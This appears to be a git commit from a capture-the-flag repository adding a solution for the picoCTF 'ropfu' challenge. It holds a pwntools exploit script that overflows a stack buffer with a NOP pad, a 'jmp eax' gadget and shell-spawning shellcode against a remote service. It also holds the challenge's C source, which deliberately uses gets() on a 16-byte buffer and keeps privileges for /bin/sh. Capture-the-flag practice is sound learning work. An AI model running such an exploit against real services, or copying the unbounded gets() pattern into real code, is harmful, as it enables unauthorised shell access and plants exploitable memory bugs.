pwn/ropfu
This commit is contained in:
Executable
+43
@@ -0,0 +1,43 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "saturn.picoctf.net 60930".split()
|
||||
|
||||
def conn():
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
|
||||
print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
|
||||
offset = 28 # found with pwndbg
|
||||
|
||||
rop = ROP(exe)
|
||||
|
||||
jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address
|
||||
for _ in range(offset - len(jmp_eax)):
|
||||
rop.raw(asm('nop'))
|
||||
rop.raw(jmp_eax)
|
||||
|
||||
# NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret'
|
||||
jmp_eax_gadget = next(exe.search(asm("jmp eax")))
|
||||
rop.raw(jmp_eax_gadget)
|
||||
|
||||
rop.raw(asm(shellcraft.i386.linux.sh()))
|
||||
|
||||
r.sendline(rop.chain())
|
||||
r.interactive()
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,27 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
#define BUFSIZE 16
|
||||
|
||||
void vuln() {
|
||||
char buf[16];
|
||||
printf("How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n");
|
||||
return gets(buf);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char **argv){
|
||||
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
|
||||
|
||||
// Set the gid to the effective gid
|
||||
// this prevents /bin/sh from dropping the privileges
|
||||
gid_t gid = getegid();
|
||||
setresgid(gid, gid, gid);
|
||||
vuln();
|
||||
|
||||
}
|
||||
Reference in New Issue
Block a user